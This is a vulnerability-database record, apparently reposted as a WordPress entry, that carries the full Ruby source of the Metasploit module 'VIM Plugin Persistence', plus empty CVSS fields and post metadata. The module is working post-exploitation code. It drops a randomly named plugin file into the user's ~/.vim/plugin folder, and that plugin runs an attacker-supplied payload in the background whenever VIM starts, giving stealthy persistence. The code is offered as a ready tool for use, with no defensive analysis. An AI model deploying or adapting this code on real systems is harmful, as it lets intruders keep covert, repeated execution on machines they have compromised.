{“lastseen”:”2026-05-08T19:28:44″,”description”:”This module creates a VIM Plugin which executes a payload on VIM startup. Module Options msf use exploit\/linux\/persistence\/vimplugin msf exploitvimplugin show targets …targets… msf exploitvimplugin set TARGET msf exploitvimplugin show options…”,”published”:”2026-05-08T18:56:55″,”modified”:”2026-05-08T18:56:55″,”type”:”metasploit”,”title”:”VIM Plugin Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-PERSISTENCE-VIM_PLUGIN-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘VIM Plugin Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module creates a VIM Plugin which executes a payload on VIM startup.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die’,\\n ],\\n ‘Platform’ =\\u003e [ ‘linux’ ],\\n ‘Arch’ =\\u003e [ ARCH_CMD ],\\n ‘SessionTypes’ =\\u003e [ ‘meterpreter’, ‘shell’ ],\\n ‘Targets’ =\\u003e [[ ‘Auto’, {} ]],\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/vimways.org\/2019\/writing-vim-plugin\/’],\\n [ ‘URL’, ‘https:\/\/www.linode.com\/docs\/guides\/writing-a-vim-plugin\/’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],\\n ],\\n ‘DisclosureDate’ =\\u003e ‘1991-11-03’, # VIM release date\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n }\\n )\\n )\\n register_advanced_options [\\n OptString.new(‘NAME’, [ false, ‘Name of the extension. Defaults to random’])\\n ]\\n end\\n\\n def check\\n return CheckCode::Safe(‘VIM is required’) unless command_exists?(‘vim’)\\n\\n CheckCode::Detected(‘VIM is installed’)\\n end\\n\\n def plugin_name\\n return datastore[‘NAME’] unless datastore[‘NAME’].empty?\\n\\n Rex::Text.rand_text_alpha(5..10)\\n end\\n\\n def get_home\\n return cmd_exec(‘echo ~’).strip\\n end\\n\\n def install_persistence\\n plugin = plugin_name\\n vim_plugin = File.read(File.join(\\n Msf::Config.data_directory, ‘exploits’, ‘vim_plugin’, ‘plugin.vim’\\n ))\\n vim_plugin = vim_plugin.gsub(‘PAYLOAD_PLACEHOLDER’, payload.encoded.gsub(‘;.\/’, ‘;nohup .\/’)) # already run async\\n vim_plugin = vim_plugin.gsub(‘NAME’, plugin)\\n\\n path = \\”#{get_home}\/.vim\/plugin\\”\\n mkdir(path, cleanup: false) unless directory?(path)\\n path = \\”#{path}\/#{plugin}.vim\\”\\n vprint_status(\\”Writing plugin to #{path}\\”)\\n unless write_file(path, vim_plugin)\\n fail_with(Failure::UnexpectedReply, \\”Failed to write VIM plugin to #{path}\\”)\\n end\\n @clean_up_rc = \\”rm #{path}\\\\n\\”\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/persistence\/vim_plugin.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/persistence\/vim_plugin\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-08T19:28:44″,”description”:”This module creates a VIM Plugin which executes a payload on VIM startup. Module Options msf use exploit\/linux\/persistence\/vimplugin msf exploitvimplugin show targets …targets… msf exploitvimplugin…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-52590","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n